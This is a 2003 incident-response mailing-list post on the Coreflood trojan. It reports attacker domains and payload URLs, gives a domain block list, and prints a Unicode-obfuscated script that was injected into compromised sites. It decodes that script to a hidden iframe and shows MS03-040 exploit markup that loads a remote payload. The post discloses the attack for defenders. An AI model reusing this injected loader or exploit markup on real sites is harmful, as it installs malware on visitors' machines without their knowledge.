RE: New Trojan

From: James C. Slora, Jr. (james.slora_at_phra.com)
Date: 10/30/03

    Date: Thu, 30 Oct 2003 16:19:09 -0500
    To: <incidents@securityfocus.com>
    
    

    Rejected by the moderator last time I tried to post on this topic. New
    backdoor.coreflood infections today from the same name string. This time
    ftp.goling2003.com at IP 66.98.178.33, wvw.goling2003.com at
    216.40.230.17 and vvv.goling2003.com at 216.40.230.17.

    wvw.goling2003.com was again the source of the infection.

    Downloads:
    http://vvv.goling2003.com:53/stop.bat
    http://vvv.goling2003.com:53/inf.ooo
    ftp.goling2003.com/ap216.exe (different type of log - URL may be
    incomplete)

    I DO think that the "goling" and "chinesenaming" strings are
    persistently relevant, and are not mere one-time distractions.

    Block
    *.goling.com
    *.goling2003.com
    *.chinesenaming.com

    Not a comprehensive list, but these are the ones I have seen repeatedly.

    IP addresses are irrelevant for blocking purposes. They have changed
    several times.

    There have been at least three mass compromises of Interland sites, and
    all three times the Coreflood author has redirected to sites with these
    types of names. The code changes, the exploit changes, and the IP
    addresses change - but he loves his aliases. They seem to be preferred
    signature strings of the author. Failing to find these strings in logs
    does not mean you are safe, but finding them gives you a reason to
    worry.

    Yet again today, a compromised Interland site redirected to the malware
    site. It appended the following script to the end of each page on the
    compromised site:
    <script type="text/javascript">
    document.write("\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d" +
                   "\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0077\u0076\u0077\u002e\u0067" +
                   "\u006f\u006c\u0069\u006e\u0067\u0032\u0030\u0030\u0033\u002e\u0063\u006f" +
                   "\u006d\u002f\u006d\u0061\u0069\u006e\u002e\u0068\u0074\u006d\u006c\u0020" +
                   "\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0030\u0020\u0068\u0065\u0069" +
                   "\u0067\u0068\u0074\u003d\u0030\u0020\u0066\u0072\u0061\u006d\u0065\u0062" +
                   "\u006f\u0072\u0064\u0065\u0072\u003d\u0030\u0020\u006d\u0061\u0072\u0067" +
                   "\u0069\u006e\u0077\u0069\u0064\u0074\u0068\u003d\u0030\u0020\u006d\u0061" +
                   "\u0072\u0067\u0069\u006e\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0030" +
                   "\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e");
    </script>

    IE is bright enough to run the script even though it comes after the
    </HTML> tag.

    The Unicode string is just ASCII expressed as Unicode. It converts to
    hex:
    %3c%69%66%72%61%6d%65%20%73%72%63%3d%68%74%74%70%3a%2f%2f%77%76%77%2e%67
    %6f%6c%69%6e%67%32%30%30%33%2e%63%6f%6d%2f%6d%61%69%6e%2e%68%74%6d%6c%20
    %20%77%69%64%74%68%3d%30%20%68%65%69%67%68%74%3d%30%20%66%72%61%6d%65%62
    %6f%72%64%65%72%3d%30%20%6d%61%72%67%69%6e%77%69%64%74%68%3d%30%20%6d%61
    %72%67%69%6e%68%65%69%67%68%74%3d%30%3e%3c%2f%69%66%72%61%6d%65%3e

    Which converts to:
    <iframe src=http://wvw.goling2003.com/main.html width=0 height=0
    frameborder=0 marginwidth=0 marginheight=0></iframe>
    Just your basic iframe, invoked by a script.

    But that page does use an exploit fixed in MS03-040 to force
    installation of arbitrary code:
    <span
    datasrc="#oa"
    datafld="ea"
    dataformatas="html">
    </span>
    <xml id="oa">
    <se>
    <ea>
    <![CDATA[
    <object
    data="http://vvv.goling2003.com:53/inf.ooo" width=0 height=0>
    </object>
    ]]>
    </ea>
    </se>
    </xml>

    > -----Original Message-----
    > From: James C. Slora, Jr.
    > Sent: Monday, October 27, 2003 4:32 PM
    > To: 'incidents@securityfocus.com'
    > Subject: RE: New Trojan
    >
    >
    > John Tran wrote:
    > > Was this trojan discussed in Microsoft Security Bulletins?
    > > If so what number
    > > or KB?
    >
    > Coreflood variants have been installed by visiting
    > compromised Web sites using exploits fixed in MS03-040 and
    > MS03-032. I'm sure there are many other vectors of infection.
    >
    > Visits to sites whose names contain the strings
    > "chinesenaming" or "goling" are particularly suspect as
    > sources of infection. These strings (and maybe others too)
    > were used in redirects from hacked Interland sites in
    > September and October.
    >
    > 216.247.117.225 was the most recent IP address I've seen
    > associated with the hostile sites.
    >
    >
